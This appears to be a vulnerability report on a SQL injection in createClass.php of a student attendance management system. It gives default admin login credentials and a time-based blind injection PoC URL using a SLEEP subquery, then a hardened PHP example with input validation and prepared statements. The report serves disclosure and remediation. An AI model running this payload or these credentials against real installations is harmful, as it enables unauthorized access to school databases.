SQL injection vulnerability in Student Attendance Management System. Input admin@mail.com / Password@123 to log in to the background. Then modify the information in createClass.php: the ID is assigned to the variable $ID and then inserted into the database for query, and the query information is returned, causing a SQL injection vulnerability.
2. SQL injection PoC:
http://127.0.0.1/Admin/createClass.php?action=edit&Id=2' AND (SELECT 5892 FROM (SELECT(SLEEP(5)))cbkc) AND 'Popu'='Popu---
Use sqlmap to verify
Manual verification
SLEEP(5)
SLEEP(8)
Build environment: Apache 2.4.39; MySQL 5.7.26; PHP 7.3.4
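A hardened form of the `Id` lookup this report describes, as an added example that is not part of the original report or the project's own code. The table and column names (`tblclass`, `className`), the function name `loadClassForEdit`, and the connection settings are assumptions; `get_result()` requires the mysqlnd driver.

```php
<?php
// Added example, not the project's code. Table/column names and the
// connection settings below are assumptions for illustration.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Return the class row for an edit request, or null when the Id is
 * missing, not a positive integer, or not present in the table.
 */
function loadClassForEdit(mysqli $conn, $rawId): ?array
{
    // 1. Allow-list the input: the Id must be a positive integer.
    //    A value carrying quotes or SQL keywords fails here and never
    //    reaches the database.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Bind the value as a typed parameter instead of concatenating it
    //    into the query string.
    $stmt = $conn->prepare('SELECT Id, className FROM tblclass WHERE Id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

if (isset($_GET['action'], $_GET['Id']) && $_GET['action'] === 'edit') {
    // Placeholder credentials (assumed); use a least-privilege DB account.
    $conn = new mysqli('127.0.0.1', 'app_user', 'CHANGE_ME', 'attendance_db');
    $row = loadClassForEdit($conn, $_GET['Id']);
    if ($row === null) {
        http_response_code(400);
        exit('Invalid class Id');
    }
    // Escape on output as well; the row is rendered into an HTML form.
    echo htmlspecialchars($row['className'], ENT_QUOTES, 'UTF-8');
}
```

With the integer check and the bound parameter in place, the response time for the `Id` value in the PoC above should no longer track the `SLEEP()` argument, which gives a simple regression check for the fix.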